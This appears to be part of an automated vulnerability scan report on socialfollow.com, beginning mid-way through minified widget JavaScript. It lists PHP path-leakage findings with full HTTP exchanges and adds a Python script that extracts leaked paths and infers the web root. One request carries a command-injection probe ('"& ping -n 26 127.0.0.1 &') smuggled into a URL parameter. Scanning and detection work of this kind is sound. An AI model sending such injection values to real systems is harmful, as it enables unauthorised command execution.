posy=menu.anchorobj._offsets.top+this.dimensions.anchorh-(menu.orientation=="lr"?this.dimensions.anchorh:0)if(posx+this.dimensions.dropmenuw+this.effects.shadow.depth[0]>this.dimensions.docscrollx+this.dimensions.docwidth){posx=posx-this.dimensions.dropmenuw+(menu.orientation=="lr"?-this.dimensions.anchorw:this.dimensions.anchorw);}if(posy+this.dimensions.dropmenuh>this.dimensions.docscrolly+this.dimensions.docheight){posy=Math.max(posy-this.dimensions.dropmenuh-(menu.orientation=="lr"?-this.dimensions.anchorh:this.dimensions.anchorh),this.dimensions.docscrolly);}if(this.effects.fade.enabled){this.setopacity(menu.dropmenu,0);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,0);}menu.dropmenu.setcss({left:posx+'px',top:posy+'px',visibility:'visible'});if(this.effects.shadow.enabled){menu.shadow.setcss({left:posx+socialfollow.effects.shadow.depth[0]+'px',top:posy+socialfollow.effects.shadow.depth[1]+'px',visibility:'visible'});}if(this.effects.fade.enabled){clearInterval(menu.animatetimer);menu.curanimatedegree=0;menu.starttime=new Date().getTime();menu.animatetimer=setInterval(function(){socialfollow.revealmenu(menuid)},20);}},revealmenu:function(menuid){var menu=socialfollow.menusmap[menuid];var elapsed=new 
Date().getTime()-menu.starttime;if(elapsed<this.effects.fade.duration){this.setopacity(menu.dropmenu,menu.curanimatedegree);if(this.effects.shadow.enabled)this.setopacity(menu.shadow,menu.curanimatedegree*this.effects.shadow.opacity);}else{clearInterval(menu.animatetimer);this.setopacity(menu.dropmenu,1);menu.dropmenu.style.filter="";}menu.curanimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetclass){if(document.querySelectorAll){return document.querySelectorAll("."+targetclass);}else{var classnameRE=new RegExp("(^|\\s+)"+targetclass+"($|\\s+)","i");var pieces=[];var alltags=document.all?document.all:document.getElementsByTagName("*");for(var i=0;i<alltags.length;i++){if(typeof alltags[i].className=="string"&&alltags[i].className.search(classnameRE)!=-1)pieces[pieces.length]=alltags[i];}return pieces;}},addDiv:function(divid,divclass,inlinestyle){var el=document.createElement("div");if(divid)el.id=divid;el.className=divclass;el.style.cssText=inlinestyle;document.body.insertBefore(el,document.body.firstChild);return el;},getmenuHTML:function(menuobj){var menucontent=[];var frag="";for(var i=0;i<menuobj.items.length;i++){if(menuobj.items[i][0]=="All Social Sites..."){frag+='<li><a href="javascript:popUp(400,100,600,300,1);" class="allSites">'+menuobj.items[i][0]+'</a></li>\n';menucontent.push(frag);frag="";}else{var socialSite=menuobj.items[i][0];var socialSiteID=menuobj.items[i][1];var socialSiteLink=menuobj.items[i][2];frag+='<li><a class="c'+socialSiteID+'" href="http://www.socialfollow.com/button/link?b=&amp;r='+document.referrer+'&amp;s='+socialSiteID+'&amp;l='+socialSiteLink+'" 
target="'+menuobj.linktarget+'">'+socialSite+'</a></li>\n';if(menuobj.items[i][3]=="efc"||i==menuobj.items.length-1){menucontent.push(frag);frag="";}}}if(typeof menuobj.cols=="undefined"){return'<ul>\n'+menucontent.join('')+'\n</ul>';}else{frag="<div class='show' style='padding: 0 3px;display:none'>";for(var i=0;i<menucontent.length;i++){frag+='<div class="'+menuobj.cols.divclass+'" style="'+menuobj.cols.inlinestyle+'">\n<ul>\n'+menucontent[i]+'</ul>\n</div>\n';}frag+="</div>";frag+='<div class="paddingSmall show" style="display:none"><div class="socialFollowLink"><a href="http://www.socialfollow.com/" target="_blank"><img src="http://www.socialfollow.com/button/image-link/?b=&amp;r='+document.referrer+'" border="0" alt="Get your own Social Follow button!" /></a></div></div>';frag+='<div class="bottomBorder show" style="display:none">&nbsp;</div>';return frag;}},addEvent:function(targetarr,functionref,tasktype){if(targetarr.length>0){var target=targetarr.shift()if(target.addEventListener){target.addEventListener(tasktype,functionref,false);}else if(target.attachEvent){target.attachEvent('on'+tasktype,function(){return functionref.call(target,window.event)});}this.addEvent(targetarr,functionref,tasktype);}},setupmenu:function(targetclass,anchorobj,pos){this.standardbody=(document.compatMode=="CSS1Compat")?document.documentElement:document.body;var relattr='menu';dropmenuid='menu';var dropmenuvar=window[dropmenuid];var dropmenu=this.addDiv(null,dropmenuvar.divclass,dropmenuvar.inlinestyle);dropmenu.innerHTML=this.getmenuHTML(dropmenuvar);var 
menu=this.menusmap[targetclass+pos]={id:targetclass+pos,anchorobj:anchorobj,dropmenu:dropmenu,revealtype:(relattr.length!=dropmenuid.length&&RegExp.$1=="click")?"click":"mouseover",orientation:anchorobj.getAttribute("rev")=="lr"?"lr":"ud",shadow:this.addDiv(null,"anylinkshadow",null)}menu.anchorobj._internalID=targetclass+pos;menu.anchorobj._isanchor=true;menu.dropmenu._internalID=targetclass+pos;menu.shadow._internalID=targetclass+pos;menu.dropmenu.setcss=this.setcss;menu.shadow.style.display="none";menu.shadow.setcss=this.setcss;menu.shadow.setcss({display:"block"});this.setopacity(menu.shadow,this.effects.shadow.opacity);this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="mouseover"&&!socialfollow.isContained(this,e)){socialfollow.showmenu(menu.id);}else if(typeof this._isanchor=="undefined"){clearTimeout(menu.hidetimer);}},"mouseover");this.addEvent([menu.anchorobj,menu.dropmenu,menu.shadow],function(e){if(!socialfollow.isContained(this,e)){var menu=socialfollow.menusmap[this._internalID];menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"mouseout");this.addEvent([menu.anchorobj,menu.dropmenu],function(e){var menu=socialfollow.menusmap[this._internalID];if(this._isanchor&&menu.revealtype=="click"){if(menu.dropmenu.style.visibility=="visible"){socialfollow.hidemenu(menu.id);}else{socialfollow.showmenu(menu.id);}if(e.preventDefault){e.preventDefault();}return false}else{menu.hidetimer=setTimeout(function(){socialfollow.hidemenu(menu.id)},socialfollow.effects.delayhide);}},"click");},init:function(targetclass){var headID=document.getElementsByTagName("head")[0];var cssNode=document.createElement('link');cssNode.type='text/css';cssNode.rel='stylesheet';cssNode.href='http://www.socialfollow.com/button/css/?b=&n=&socialSites=';cssNode.media='screen';headID.appendChild(cssNode);var 
imgs=this.getElementsByClass(targetclass);for(var i=0;i<imgs.length;i++){if('done'!=imgs[i].getAttribute('rel')){imgs[i].setAttribute('rel','done');this.setupmenu(targetclass,imgs[i],i);this.border="0";var hidden_divs=this.getElementsByClass('show');setTimeout(function(){for(var i=0;i<hidden_divs.length;i++){if('undefined'!=typeof(hidden_divs[i].style))hidden_divs[i].style.display='';}},200);}}}}function openwindow(url){document.body.removeChild(document.getElementById('popup'));document.body.removeChild(document.getElementById('popup1'));window.open(url);}function check_browser(){var re=/\s+(X?HTML)\s+([\d\.]+)\s*([^\/]+)*\/(?:[^"]+"\s"([^"]+)")?/gi;var res=false;metaCollection=document.getElementsByTagName('meta');for(i=0;i<metaCollection.length;i++){if('X-UA-Compatible'==metaCollection[i].httpEquiv&&'IE=EmulateIE7'==metaCollection[i].content)return false;}if(typeof document.namespaces!="undefined"){res=(8==document.all[0].nodeType)?re.test(document.all[0].nodeValue):false;}else{res=(null!=document.doctype)?re.test(document.doctype.publicId):false;}if(res){res=new Object();var type=RegExp.$1;var version=RegExp.$2;var doctype_extended=RegExp.$3.toLowerCase();var doctype_url=RegExp.$4if((/strict\.dtd/.test(doctype_url)||'strict'==doctype_extended)||(('HTML'==type&&'4.01'==version)&&!/http:\/\//.test(doctype_url)))return false;return(('XHTML'==type&&'1.0'==version)||('HTML'==type&&'4.01'==version))?true:false;return result;}else{return false;}}
- /button/image/

/button/image/

http://www.socialfollow.com/button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

Identified Internal Path(s)

  • /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php
  • /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3

Request

GET /button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
- /blog/wp-content/themes/social-follow-theme2/

/blog/wp-content/themes/social-follow-theme2/

http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/

Identified Internal Path(s)

/var/www/vhosts/socialfollow.com/httpdocs/blog/wp-content/themes/social-follow-theme2/index.php

Request

GET /blog/wp-content/themes/social-follow-theme2/ HTTP/1.1
Referer: http://www.socialfollow.com/blog/wp-content/themes/social-follow-theme2/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=98685f18ee12a511243ce85c9241bd6b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:08:33 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 197
Keep-Alive: timeout=2, max=86
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Fatal error</b>: Call to undefined function get_header() in <b>/var/www/vhosts/socialfollow.com/httpdocs/blog/wp-content/themes/social-follow-theme2/index.php</b> on line <b>7</b><br />
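The three responses quoted in this finding all leak paths through PHP's display_errors output. The script below is an added example and is not part of the Netsparker report or of socialfollow.com's own code: it re-implements the "Internal Path Leakage (*nix)" check offline by parsing the PHP warning and fatal-error markup, collecting the distinct file and line pairs, and inferring the document root by lining up the request's URL directory with the leaked script path. The sample bodies are copied from the report (the minified JavaScript after the /button/ warnings is cut off, and the repeated line-6 and line-7 "headers already sent" warnings for /button/image/ are omitted); the regexes, function names and the root inference are this example's own assumptions.

```python
"""Extract leaked *nix paths from PHP error output in HTTP response bodies.

Added example; it is not part of the Netsparker report or of socialfollow.com's
own code. It re-implements the "Internal Path Leakage (*nix)" check over copies
of the three response bodies quoted in this finding. Regexes, function names
and the document-root inference are this example's own assumptions.
"""
import re
from html import unescape
from typing import Dict, List, NamedTuple, Optional, Tuple

# display_errors=On markup: "<b>Warning</b>: msg in <b>/path/x.php</b> on line <b>N</b>".
# Whitespace around "in" / "on line" is optional: the /button/ response has it stripped.
PHP_ERROR_RE = re.compile(
    r"<b>(?P<kind>Warning|Notice|Fatal error|Parse error)</b>\s*:\s*(?P<msg>.*?)"
    r"\s*in\s*<b>(?P<file>/[^<]+)</b>\s*on line\s*<b>(?P<line>\d+)</b>",
    re.IGNORECASE | re.DOTALL,
)
# "headers already sent" warnings carry a second location: "(output started at /path/x.php:N)".
OUTPUT_STARTED_RE = re.compile(r"output started at\s*(?P<file>/[^\s:)]+):(?P<line>\d+)")


class Leak(NamedTuple):
    file: str   # absolute server-side path disclosed to the client
    line: int   # line number PHP reported alongside it
    kind: str   # "Warning", "Fatal error", ... or "output started at"


def leaked_paths(body: str) -> List[Leak]:
    """Distinct (file, line) pairs disclosed by PHP errors, sorted by path then line."""
    body = unescape(body)
    found: Dict[Tuple[str, int], str] = {}
    for m in PHP_ERROR_RE.finditer(body):
        found.setdefault((m["file"], int(m["line"])), m["kind"])
    for m in OUTPUT_STARTED_RE.finditer(body):
        # Usually repeats a location already reported above; setdefault keeps the first kind.
        found.setdefault((m["file"], int(m["line"])), "output started at")
    return [Leak(f, n, k) for (f, n), k in sorted(found.items())]


def document_root(file_path: str, request_target: str) -> Optional[str]:
    """Infer the web root by lining up the request's URL directory with the leaked script path.

    /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php requested as
    /button/image/?b=1 yields /var/www/vhosts/socialfollow.com/httpdocs.
    """
    url_dir = request_target.split("?", 1)[0].rsplit("/", 1)[0] + "/"
    idx = file_path.rfind(url_dir)
    return file_path[:idx] if idx > 0 else None


def scan(request_target: str, body: str) -> Dict[str, object]:
    """One finding per response: the leaked paths plus the document root they imply."""
    paths = leaked_paths(body)
    roots = {document_root(p.file, request_target) for p in paths} - {None}
    return {
        "request": request_target,
        "paths": paths,
        "document_root": roots.pop() if len(roots) == 1 else None,
    }


# Response bodies copied from the report above, used here as constructed offline input.
# The minified JavaScript after the /button/ warnings is cut off after a few bytes, and the
# line-6 and line-7 repeats of the /button/image/ "headers already sent" warning are omitted.
SAMPLE_BUTTON = (
    "<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource "
    "in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/>"
    "<br/><b>Warning</b>:Cannot modify header information-headers already sent by(output started at"
    "/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/"
    "socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>var menu={divclass:'sociallinks'"
)
SAMPLE_BUTTON_IMAGE = (
    "<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource "
    "in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br />"
    "<br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at "
    "/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/"
    "socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br />"
    "<br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>"
    "function.file-get-contents</a>]: failed to open stream: No such file or directory in "
    "<b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />"
)
SAMPLE_THEME = (
    "<br /><b>Fatal error</b>: Call to undefined function get_header() in "
    "<b>/var/www/vhosts/socialfollow.com/httpdocs/blog/wp-content/themes/social-follow-theme2/index.php</b>"
    " on line <b>7</b><br />"
)

if __name__ == "__main__":
    for target, body in [
        ("/button/", SAMPLE_BUTTON),
        ("/button/image/?b=%22%26%20ping%20-n%2026%20127.0.0.1%20%26", SAMPLE_BUTTON_IMAGE),
        ("/blog/wp-content/themes/social-follow-theme2/", SAMPLE_THEME),
    ]:
        result = scan(target, body)
        print(target, "->", result["document_root"])
        for leak in result["paths"]:
            print(f"  {leak.kind}: {leak.file}:{leak.line}")
```

Run as a script it prints the three findings with the inferred document root /var/www/vhosts/socialfollow.com/httpdocs; the same functions can be pointed at any saved response body. The report's second bullet for /button/image/, index.php:3, is the "output started at" location, which the script folds into the line-3 warning rather than listing twice.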